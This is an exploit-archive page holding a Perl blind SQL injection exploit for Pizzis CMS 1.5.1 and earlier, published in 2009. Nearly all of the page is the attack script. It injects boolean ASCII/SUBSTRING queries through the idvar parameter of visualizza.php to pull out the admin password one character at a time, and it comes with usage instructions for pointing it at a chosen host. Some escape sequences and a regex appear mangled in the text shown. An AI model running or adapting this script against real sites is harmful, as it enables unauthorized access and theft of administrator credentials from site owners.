[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit
# Published : 2009-01-08
# Author : darkjoker
# Previous Title : PHP-Fusion Mod vArcade 1.8 (comment_id) SQL Injection Vulnerability
# Next Title : XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit
--+++=============================================================+++--
--+++====== Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit ======+++--
--+++=============================================================+++--
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
sub usage {
die
"n[+] Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit".
"n[+] Author: darkjoker".
"n[+] Site : http://darkjoker.net23.net".
"n[+] Usage : perl $0 <hostname> <path> <username>".
"n[+] Ex. : perl $0 localhost /pizziscms admin".
"n[+] Greetz: my girlfriend, she has no idea about what is it <3".
"nn";
}
sub query {
my ($user, $chr, $pos) = @_;
my $query = "98765 OR ASCII(SUBSTRING((SELECT pass FROM pizziscms_admin WHERE user = '${user}'),${pos},1))=${chr}";
$query =~ s/ /%20/g;
$query =~ s/'/%27/g;
return $query;
}
sub exploit {
my ($hostname, $path, $user, $chr, $pos) = @_;
$chr = ord ($chr);
my $sock = new IO::Socket::INET (
PeerHost => $hostname,
PeerPort => 80,
Proto => "tcp",
) or die $!;
my $query = query ($user, $chr, $pos);
my $request = "GET ${path}/visualizza.php?idvar=${query} HTTP/1.1rn".
"Host: ${hostname}rn".
"Connection: Closernrn";
print $sock $request;
my $reply;
while (<$sock>)
{
$reply .= $_;
}
close ($sock);
$reply =~ s/s/ /g;
$reply =~ /<h4>(.+)/h4>/;
if (length ($1) > 1)
{
return 1;
}
else
{
return 0;
}
}
if (scalar (@ARGV) != 3)
{
usage ();
}
my ($hostname, $path, $user) = @ARGV;
my @key = split ('', 'abcdefghijklmnopqrstuvwxyz0123456789');
my $pos = 1;
my $chr = 0;
print "[+] Password: ";
while ($pos <= 32)
{
if (exploit ($hostname, $path, $user, $key [$chr], $pos))
{
print $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
print "n";
# www.Syue.com [2009-01-08]